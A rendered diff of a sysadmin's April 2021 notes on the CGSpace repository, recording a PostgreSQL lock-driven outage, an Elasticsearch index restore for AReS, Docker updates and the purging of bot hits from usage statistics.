                                                                                                                                                                                                                                                                              +12198
                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                              • I see that there are tons of PostgreSQL connections getting abandoned today, compared to very few in the past few weeks:
                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                              $ journalctl -u tomcat7 --since=today | grep -c 'ConnectionPool abandon'
                                                                                                                                                                                                                                                                              -1838
                                                                                                                                                                                                                                                                              -$ journalctl -u tomcat7 --since=2021-03-20 --until=2021-04-05 | grep -c 'ConnectionPool abandon'
                                                                                                                                                                                                                                                                              -3
                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                $ journalctl -u tomcat7 --since=today | grep -c 'ConnectionPool abandon'
                                                                                                                                                                                                                                                                                +1838
                                                                                                                                                                                                                                                                                +$ journalctl -u tomcat7 --since=2021-03-20 --until=2021-04-05 | grep -c 'ConnectionPool abandon'
                                                                                                                                                                                                                                                                                +3
                                                                                                                                                                                                                                                                                +
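A per-day breakdown makes the jump in abandoned connections easier to see than two aggregate counts. The following is a minimal sketch, not something from the original notes: the function name `abandoned_per_day` is hypothetical, and it assumes the journal is read with `-o short-iso` so that every line starts with an ISO date.

```shell
# Sketch: count 'ConnectionPool abandon' messages per calendar day.
# Assumes input lines start with an ISO timestamp (journalctl -o short-iso).
# abandoned_per_day is a hypothetical helper name.
abandoned_per_day() {
    grep 'ConnectionPool abandon' |
        awk '{ count[substr($0, 1, 10)]++ } END { for (day in count) print day, count[day] }' |
        sort
}

# Usage (reads the journal from stdin):
#   journalctl -u tomcat7 --since=2021-03-20 -o short-iso | abandoned_per_day
```

Each output line is a date followed by the number of matching messages on that day.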
                                                                                                                                                                                                                                                                                • I even restarted the server and connections were low for a few minutes until they shot back up:
                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                -13
                                                                                                                                                                                                                                                                                -$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                -8651
                                                                                                                                                                                                                                                                                -$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                -8940
                                                                                                                                                                                                                                                                                -$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                -10504
                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                  $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                  +13
                                                                                                                                                                                                                                                                                  +$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                  +8651
                                                                                                                                                                                                                                                                                  +$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                  +8940
                                                                                                                                                                                                                                                                                  +$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                  +10504
                                                                                                                                                                                                                                                                                  +
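Piping psql's default output through `wc -l` also counts the header, separator, and row-count footer, so the figures above run a few lines high. A rough sketch of sampling the exact count over time could look like this. The helper names `count_locks` and `watch_locks` are hypothetical, and it assumes `psql` connects with the same defaults as the commands above.

```shell
# Sketch: count lock rows directly instead of counting psql output lines.
# -A (unaligned) and -t (tuples only) make psql print just the number.
count_locks() {
    psql -At -c 'SELECT count(*) FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;'
}

# Hypothetical helper: print a UTC-timestamped sample every $1 seconds, $2 times.
watch_locks() {
    interval="${1:-60}"
    samples="${2:-5}"
    i=0
    while [ "$i" -lt "$samples" ]; do
        printf '%s %s\n' "$(date -u +%Y-%m-%dT%H:%M:%SZ)" "$(count_locks)"
        i=$((i + 1))
        # Sleep only between samples, not after the last one
        if [ "$i" -lt "$samples" ]; then
            sleep "$interval"
        fi
    done
}
```

For example, `watch_locks 30 10` would print ten samples thirty seconds apart, which is enough to see how quickly the locks climb after a restart.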
                                                                                                                                                                                                                                                                                  • I had to go to bed and I bet it will crash and be down for hours until I wake up…
                                                                                                                                                                                                                                                                                  • What the hell is this user agent?
                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                  54.197.119.143 - - [06/Apr/2021:19:18:11 +0200] "GET /handle/10568/16499 HTTP/1.1" 499 0 "-" "GetUrl/1.0 wdestiny@umich.edu (Linux)"
                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                  54.197.119.143 - - [06/Apr/2021:19:18:11 +0200] "GET /handle/10568/16499 HTTP/1.1" 499 0 "-" "GetUrl/1.0 wdestiny@umich.edu (Linux)"
                                                                                                                                                                                                                                                                                   

                                                                                                                                                                                                                                                                                  2021-04-07

                                                                                                                                                                                                                                                                                  • CGSpace was still down from last night of course, with tons of database locks:
                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                  $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                  -12168
                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                    $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                    +12168
                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                    • I restarted the server again and the locks came back
                                                                                                                                                                                                                                                                                    • Atmire responded to the message from yesterday
                                                                                                                                                                                                                                                                                        @@ -504,8 +504,8 @@ $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN p
                                                                                                                                                                                                                                                                                    -
2021-04-01 12:45:11,414 WARN  org.dspace.workflowbasic.BasicWorkflowServiceImpl @ a.akwarandu@cgiar.org:session_id=2F20F20D4A8C36DB53D42DE45DFA3CCE:notifyGroupofTask:cannot email user group_id=aecf811b-b7e9-4b6f-8776-3d372e6a048b workflow_item_id=33085:  Invalid Addresses (com.sun.mail.smtp.SMTPAddressFailedException: 501 5.1.3 Invalid address
                                                                                                                                                                                                                                                                                    -
                                                                                                                                                                                                                                                                                      +
2021-04-01 12:45:11,414 WARN  org.dspace.workflowbasic.BasicWorkflowServiceImpl @ a.akwarandu@cgiar.org:session_id=2F20F20D4A8C36DB53D42DE45DFA3CCE:notifyGroupofTask:cannot email user group_id=aecf811b-b7e9-4b6f-8776-3d372e6a048b workflow_item_id=33085:  Invalid Addresses (com.sun.mail.smtp.SMTPAddressFailedException: 501 5.1.3 Invalid address
                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                      • The issue is not the named user above, but a member of the group…
                                                                                                                                                                                                                                                                                      • And the group does have users with invalid email addresses (probably accounts created automatically after authenticating with LDAP):
                                                                                                                                                                                                                                                                                      @@ -513,51 +513,51 @@ $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN p
                                                                                                                                                                                                                                                                                      • I extracted all the group IDs from recent logs that had users with invalid email addresses:
                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                      $ grep -a -E 'email user group_id=\b[0-9a-f]{8}\b-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-\b[0-9a-f]{12}\b' /home/cgspace.cgiar.org/log/dspace.log.* | grep -o -E '\b[0-9a-f]{8}\b-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-\b[0-9a-f]{12}\b' | sort | uniq
                                                                                                                                                                                                                                                                                      -0a30d6ae-74a6-4eee-a8f5-ee5d15192ee6
                                                                                                                                                                                                                                                                                      -1769137c-36d4-42b2-8fec-60585e110db7
                                                                                                                                                                                                                                                                                      -203c8614-8a97-4ac8-9686-d9d62cb52acc
                                                                                                                                                                                                                                                                                      -294603de-3d09-464e-a5b0-09e452c6b5ab
                                                                                                                                                                                                                                                                                      -35878555-9623-4679-beb8-bb3395fdf26e
                                                                                                                                                                                                                                                                                      -3d8a5efa-5509-4bf9-9374-2bc714aceb99
                                                                                                                                                                                                                                                                                      -4238208a-f848-47cb-9dd2-43f9f954a4af
                                                                                                                                                                                                                                                                                      -44939b84-1894-41e7-b3e6-8c8d1781057b
                                                                                                                                                                                                                                                                                      -49ba087e-75a3-45ce-805c-69eeda0f786b
                                                                                                                                                                                                                                                                                      -4a6606ce-0284-421d-bf80-4dafddba2d42
                                                                                                                                                                                                                                                                                      -527de6aa-9cd0-4988-bf5f-c9c92ba2ac10
                                                                                                                                                                                                                                                                                      -54cd1b16-65bf-4041-9d84-fb2ea3301d6d
                                                                                                                                                                                                                                                                                      -58982847-5f7c-4b8b-a7b0-4d4de702136e
                                                                                                                                                                                                                                                                                      -5f0b85be-bd23-47de-927d-bca368fa1fbc
                                                                                                                                                                                                                                                                                      -646ada17-e4ef-49f6-9378-af7e58596ce1
                                                                                                                                                                                                                                                                                      -7e2f4bf8-fbc9-4b2f-97a4-75e5427bef90
                                                                                                                                                                                                                                                                                      -8029fd53-f9f5-4107-bfc3-8815507265cf
                                                                                                                                                                                                                                                                                      -81faa934-c602-4608-bf45-de91845dfea7
                                                                                                                                                                                                                                                                                      -8611a462-210c-4be1-a5bb-f87a065e6113
                                                                                                                                                                                                                                                                                      -8855c903-ef86-433c-b0be-c12300eb0f84
                                                                                                                                                                                                                                                                                      -8c7ece98-3598-4de7-a885-d61fd033bea8
                                                                                                                                                                                                                                                                                      -8c9a0d01-2d12-4a99-84f9-cdc25ac072f9
                                                                                                                                                                                                                                                                                      -8f9f888a-b501-41f3-a462-4da16150eebf
                                                                                                                                                                                                                                                                                      -94168f0e-9f45-4112-ac8d-3ba9be917842
                                                                                                                                                                                                                                                                                      -96998038-f381-47dc-8488-ff7252703627
                                                                                                                                                                                                                                                                                      -9768f4a8-3018-44e9-bf58-beba4296327c
                                                                                                                                                                                                                                                                                      -9a99e8d2-558e-4fc1-8011-e4411f658414
                                                                                                                                                                                                                                                                                      -a34e6400-78ed-45c0-a751-abc039eed2e6
                                                                                                                                                                                                                                                                                      -a9da5af3-4ec7-4a9b-becb-6e3d028d594d
                                                                                                                                                                                                                                                                                      -abf5201c-8be5-4dee-b461-132203dd51cb
                                                                                                                                                                                                                                                                                      -adb5658c-cef3-402f-87b6-b498f580351c
                                                                                                                                                                                                                                                                                      -aecf811b-b7e9-4b6f-8776-3d372e6a048b
                                                                                                                                                                                                                                                                                      -ba5aae61-ea34-4ac1-9490-4645acf2382f
                                                                                                                                                                                                                                                                                      -bf7f3638-c7c6-4a8f-893d-891a6d3dafff
                                                                                                                                                                                                                                                                                      -c617ada0-09d1-40ed-b479-1c4860a4f724
                                                                                                                                                                                                                                                                                      -cff91d44-a855-458c-89e5-bd48c17d1a54
                                                                                                                                                                                                                                                                                      -e65171ae-a2bf-4043-8f54-f8457bc9174b
                                                                                                                                                                                                                                                                                      -e7098b40-4701-4ca2-b9a9-3a1282f67044
                                                                                                                                                                                                                                                                                      -e904f122-71dc-439b-b877-313ef62486d7
                                                                                                                                                                                                                                                                                      -ede59734-adac-4c01-8691-b45f19088d37
                                                                                                                                                                                                                                                                                      -f88bd6bb-f93f-41cb-872f-ff26f6237068
                                                                                                                                                                                                                                                                                      -f985f5fb-be5c-430b-a8f1-cf86ae4fc49a
                                                                                                                                                                                                                                                                                      -fe800006-aaec-4f9e-9ab4-f9475b4cbdc3
                                                                                                                                                                                                                                                                                      -

                                                                                                                                                                                                                                                                                      2021-04-08

                                                                                                                                                                                                                                                                                      +
                                                                                                                                                                                                                                                                                      $ grep -a -E 'email user group_id=\b[0-9a-f]{8}\b-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-\b[0-9a-f]{12}\b' /home/cgspace.cgiar.org/log/dspace.log.* | grep -o -E '\b[0-9a-f]{8}\b-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-\b[0-9a-f]{12}\b' | sort | uniq
                                                                                                                                                                                                                                                                                      +0a30d6ae-74a6-4eee-a8f5-ee5d15192ee6
                                                                                                                                                                                                                                                                                      +1769137c-36d4-42b2-8fec-60585e110db7
                                                                                                                                                                                                                                                                                      +203c8614-8a97-4ac8-9686-d9d62cb52acc
                                                                                                                                                                                                                                                                                      +294603de-3d09-464e-a5b0-09e452c6b5ab
                                                                                                                                                                                                                                                                                      +35878555-9623-4679-beb8-bb3395fdf26e
                                                                                                                                                                                                                                                                                      +3d8a5efa-5509-4bf9-9374-2bc714aceb99
                                                                                                                                                                                                                                                                                      +4238208a-f848-47cb-9dd2-43f9f954a4af
                                                                                                                                                                                                                                                                                      +44939b84-1894-41e7-b3e6-8c8d1781057b
                                                                                                                                                                                                                                                                                      +49ba087e-75a3-45ce-805c-69eeda0f786b
                                                                                                                                                                                                                                                                                      +4a6606ce-0284-421d-bf80-4dafddba2d42
                                                                                                                                                                                                                                                                                      +527de6aa-9cd0-4988-bf5f-c9c92ba2ac10
                                                                                                                                                                                                                                                                                      +54cd1b16-65bf-4041-9d84-fb2ea3301d6d
                                                                                                                                                                                                                                                                                      +58982847-5f7c-4b8b-a7b0-4d4de702136e
                                                                                                                                                                                                                                                                                      +5f0b85be-bd23-47de-927d-bca368fa1fbc
                                                                                                                                                                                                                                                                                      +646ada17-e4ef-49f6-9378-af7e58596ce1
                                                                                                                                                                                                                                                                                      +7e2f4bf8-fbc9-4b2f-97a4-75e5427bef90
                                                                                                                                                                                                                                                                                      +8029fd53-f9f5-4107-bfc3-8815507265cf
                                                                                                                                                                                                                                                                                      +81faa934-c602-4608-bf45-de91845dfea7
                                                                                                                                                                                                                                                                                      +8611a462-210c-4be1-a5bb-f87a065e6113
                                                                                                                                                                                                                                                                                      +8855c903-ef86-433c-b0be-c12300eb0f84
                                                                                                                                                                                                                                                                                      +8c7ece98-3598-4de7-a885-d61fd033bea8
                                                                                                                                                                                                                                                                                      +8c9a0d01-2d12-4a99-84f9-cdc25ac072f9
                                                                                                                                                                                                                                                                                      +8f9f888a-b501-41f3-a462-4da16150eebf
                                                                                                                                                                                                                                                                                      +94168f0e-9f45-4112-ac8d-3ba9be917842
                                                                                                                                                                                                                                                                                      +96998038-f381-47dc-8488-ff7252703627
                                                                                                                                                                                                                                                                                      +9768f4a8-3018-44e9-bf58-beba4296327c
                                                                                                                                                                                                                                                                                      +9a99e8d2-558e-4fc1-8011-e4411f658414
                                                                                                                                                                                                                                                                                      +a34e6400-78ed-45c0-a751-abc039eed2e6
                                                                                                                                                                                                                                                                                      +a9da5af3-4ec7-4a9b-becb-6e3d028d594d
                                                                                                                                                                                                                                                                                      +abf5201c-8be5-4dee-b461-132203dd51cb
                                                                                                                                                                                                                                                                                      +adb5658c-cef3-402f-87b6-b498f580351c
                                                                                                                                                                                                                                                                                      +aecf811b-b7e9-4b6f-8776-3d372e6a048b
                                                                                                                                                                                                                                                                                      +ba5aae61-ea34-4ac1-9490-4645acf2382f
                                                                                                                                                                                                                                                                                      +bf7f3638-c7c6-4a8f-893d-891a6d3dafff
                                                                                                                                                                                                                                                                                      +c617ada0-09d1-40ed-b479-1c4860a4f724
                                                                                                                                                                                                                                                                                      +cff91d44-a855-458c-89e5-bd48c17d1a54
                                                                                                                                                                                                                                                                                      +e65171ae-a2bf-4043-8f54-f8457bc9174b
                                                                                                                                                                                                                                                                                      +e7098b40-4701-4ca2-b9a9-3a1282f67044
                                                                                                                                                                                                                                                                                      +e904f122-71dc-439b-b877-313ef62486d7
                                                                                                                                                                                                                                                                                      +ede59734-adac-4c01-8691-b45f19088d37
                                                                                                                                                                                                                                                                                      +f88bd6bb-f93f-41cb-872f-ff26f6237068
                                                                                                                                                                                                                                                                                      +f985f5fb-be5c-430b-a8f1-cf86ae4fc49a
                                                                                                                                                                                                                                                                                      +fe800006-aaec-4f9e-9ab4-f9475b4cbdc3
                                                                                                                                                                                                                                                                                      +

                                                                                                                                                                                                                                                                                      2021-04-08

                                                                                                                                                                                                                                                                                      • I can’t believe it but the server has been down for twelve hours or so
                                                                                                                                                                                                                                                                                          @@ -565,26 +565,26 @@ fe800006-aaec-4f9e-9ab4-f9475b4cbdc3
                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                      $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                      -12070
                                                                                                                                                                                                                                                                                      -
                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                        $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                        +12070
                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                        • I restarted PostgreSQL and Tomcat and the locks go straight back up!
                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                        $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                        -13
                                                                                                                                                                                                                                                                                        -$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                        -986
                                                                                                                                                                                                                                                                                        -$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                        -1194
                                                                                                                                                                                                                                                                                        -$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                        -1212
                                                                                                                                                                                                                                                                                        -$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                        -1489
                                                                                                                                                                                                                                                                                        -$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                        -2124
                                                                                                                                                                                                                                                                                        -$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                        -5934
                                                                                                                                                                                                                                                                                        -

                                                                                                                                                                                                                                                                                        2021-04-09

                                                                                                                                                                                                                                                                                        +
                                                                                                                                                                                                                                                                                        $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                        +13
                                                                                                                                                                                                                                                                                        +$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                        +986
                                                                                                                                                                                                                                                                                        +$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                        +1194
                                                                                                                                                                                                                                                                                        +$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                        +1212
                                                                                                                                                                                                                                                                                        +$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                        +1489
                                                                                                                                                                                                                                                                                        +$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                        +2124
                                                                                                                                                                                                                                                                                        +$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
                                                                                                                                                                                                                                                                                        +5934
                                                                                                                                                                                                                                                                                        +

                                                                                                                                                                                                                                                                                        2021-04-09

                                                                                                                                                                                                                                                                                        • Atmire managed to get CGSpace back up by killing all the PostgreSQL connections yesterday
                                                                                                                                                                                                                                                                                            @@ -608,46 +608,46 @@ $ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN p
                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                        $ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                                                                                                                                                                                                                                        -$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-backup
                                                                                                                                                                                                                                                                                        -$ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                                                                                                                                                                                                                                                                                        -$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                                                                                                                                                                                                                        -$ curl -XDELETE 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                                                                                                                                                        -
                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                          $ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                                                                                                                                                                                                                                          +$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-backup
                                                                                                                                                                                                                                                                                          +$ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
                                                                                                                                                                                                                                                                                          +$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
                                                                                                                                                                                                                                                                                          +$ curl -XDELETE 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                                                                                                                                                          +
                                                                                                                                                                                                                                                                                          • Then I updated all Docker containers and rebooted the server (linode20) so that the correct indexes would be created again:
                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                          $ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                          -
                                                                                                                                                                                                                                                                                            +
                                                                                                                                                                                                                                                                                            $ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
                                                                                                                                                                                                                                                                                            +
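For reference, a minimal sketch of what the text-munging part of that pipeline does, run against made-up `docker images` output so it works without Docker. The `sample_images` and `image_refs` names and the sample rows are hypothetical, not from the original notes, and the `\+` in the sed expression assumes GNU sed.

```shell
# Hypothetical stand-in for `docker images` output (illustrative rows only).
sample_images() {
  cat <<'EOF'
REPOSITORY      TAG       IMAGE ID       CREATED        SIZE
nginx           latest    605c77e624dd   2 months ago   141MB
redis           6         7614ae9453d1   3 months ago   113MB
EOF
}

# Same transformation as the pipeline above, minus the final `docker pull`:
#   1. drop the header row
#   2. collapse each run of spaces into a single colon (GNU sed syntax)
#   3. keep only the first two colon-separated fields, i.e. repository:tag
image_refs() {
  grep -v '^REPO' | sed 's/ \+/:/g' | cut -d: -f1,2
}

sample_images | image_refs
```

Because `cut` splits on colons, a repository name that itself contains a colon (for example a registry with a port) would be truncated, and untagged images show up as `<none>`. Letting Docker format the list directly with `docker images --format '{{.Repository}}:{{.Tag}}'` avoids the text parsing, at the cost of still needing to filter out the `<none>` entries.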
                                                                                                                                                                                                                                                                                            • Then I realized I have to clone the backup index directly to openrxv-items-final, and re-create the openrxv-items alias:
                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                            $ curl -XDELETE 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                                                                                                                                                            -$ curl -X PUT "localhost:9200/openrxv-items-backup/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                                                                                                                                                                                                                                            -$ curl -s -X POST http://localhost:9200/openrxv-items-backup/_clone/openrxv-items-final
                                                                                                                                                                                                                                                                                            -$ curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
                                                                                                                                                                                                                                                                                            -
                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                              $ curl -XDELETE 'http://localhost:9200/openrxv-items-final'
                                                                                                                                                                                                                                                                                              +$ curl -X PUT "localhost:9200/openrxv-items-backup/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
                                                                                                                                                                                                                                                                                              +$ curl -s -X POST http://localhost:9200/openrxv-items-backup/_clone/openrxv-items-final
                                                                                                                                                                                                                                                                                              +$ curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
                                                                                                                                                                                                                                                                                              +
                                                                                                                                                                                                                                                                                              • Now I see both openrxv-items-final and openrxv-items have the current number of items:
                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                              $ curl -s 'http://localhost:9200/openrxv-items/_count?q=*&pretty'     
                                                                                                                                                                                                                                                                                              -{
                                                                                                                                                                                                                                                                                              -  "count" : 103373,
                                                                                                                                                                                                                                                                                              -  "_shards" : {
                                                                                                                                                                                                                                                                                              -    "total" : 1,
                                                                                                                                                                                                                                                                                              -    "successful" : 1,
                                                                                                                                                                                                                                                                                              -    "skipped" : 0,
                                                                                                                                                                                                                                                                                              -    "failed" : 0
                                                                                                                                                                                                                                                                                              -  }
                                                                                                                                                                                                                                                                                              -}
                                                                                                                                                                                                                                                                                              -$ curl -s 'http://localhost:9200/openrxv-items-final/_count?q=*&pretty'
                                                                                                                                                                                                                                                                                              -{
                                                                                                                                                                                                                                                                                              -  "count" : 103373,
                                                                                                                                                                                                                                                                                              -  "_shards" : {
                                                                                                                                                                                                                                                                                              -    "total" : 1,
                                                                                                                                                                                                                                                                                              -    "successful" : 1,
                                                                                                                                                                                                                                                                                              -    "skipped" : 0,
                                                                                                                                                                                                                                                                                              -    "failed" : 0
                                                                                                                                                                                                                                                                                              -  }
                                                                                                                                                                                                                                                                                              -}
                                                                                                                                                                                                                                                                                              -
                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                $ curl -s 'http://localhost:9200/openrxv-items/_count?q=*&pretty'     
                                                                                                                                                                                                                                                                                                +{
                                                                                                                                                                                                                                                                                                +  "count" : 103373,
                                                                                                                                                                                                                                                                                                +  "_shards" : {
                                                                                                                                                                                                                                                                                                +    "total" : 1,
                                                                                                                                                                                                                                                                                                +    "successful" : 1,
                                                                                                                                                                                                                                                                                                +    "skipped" : 0,
                                                                                                                                                                                                                                                                                                +    "failed" : 0
                                                                                                                                                                                                                                                                                                +  }
                                                                                                                                                                                                                                                                                                +}
                                                                                                                                                                                                                                                                                                +$ curl -s 'http://localhost:9200/openrxv-items-final/_count?q=*&pretty'
                                                                                                                                                                                                                                                                                                +{
                                                                                                                                                                                                                                                                                                +  "count" : 103373,
                                                                                                                                                                                                                                                                                                +  "_shards" : {
                                                                                                                                                                                                                                                                                                +    "total" : 1,
                                                                                                                                                                                                                                                                                                +    "successful" : 1,
                                                                                                                                                                                                                                                                                                +    "skipped" : 0,
                                                                                                                                                                                                                                                                                                +    "failed" : 0
                                                                                                                                                                                                                                                                                                +  }
                                                                                                                                                                                                                                                                                                +}
                                                                                                                                                                                                                                                                                                +
                                                                                                                                                                                                                                                                                                • Then I started a fresh harvesting in the AReS Explorer admin dashboard

                                                                                                                                                                                                                                                                                                2021-04-12

                                                                                                                                                                                                                                                                                                @@ -672,39 +672,39 @@ $ curl -s 'http://localhost:9200/openrxv-items-f
                                                                                                                                                                                                                                                                                                • 13,000 requests in the last two months from a user with user agent SomeRandomText, for example:
                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                84.33.2.97 - - [06/Apr/2021:06:25:13 +0200] "GET /bitstream/handle/10568/77776/CROP%20SCIENCE.jpg.jpg HTTP/1.1" 404 10890 "-" "SomeRandomText"
                                                                                                                                                                                                                                                                                                -
                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                  84.33.2.97 - - [06/Apr/2021:06:25:13 +0200] "GET /bitstream/handle/10568/77776/CROP%20SCIENCE.jpg.jpg HTTP/1.1" 404 10890 "-" "SomeRandomText"
                                                                                                                                                                                                                                                                                                  +
                                                                                                                                                                                                                                                                                                  • I purged them:
                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                  $ ./ilri/check-spider-hits.sh -f /tmp/agents.txt -p
                                                                                                                                                                                                                                                                                                  -Purging 13159 hits from SomeRandomText in statistics
                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                  -Total number of bot hits purged: 13159
                                                                                                                                                                                                                                                                                                  -
                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                    $ ./ilri/check-spider-hits.sh -f /tmp/agents.txt -p
                                                                                                                                                                                                                                                                                                    +Purging 13159 hits from SomeRandomText in statistics
                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                    +Total number of bot hits purged: 13159
                                                                                                                                                                                                                                                                                                    +
                                                                                                                                                                                                                                                                                                    • I noticed there were 78 items submitted in the hour before CGSpace crashed:
                                                                                                                                                                                                                                                                                                    -
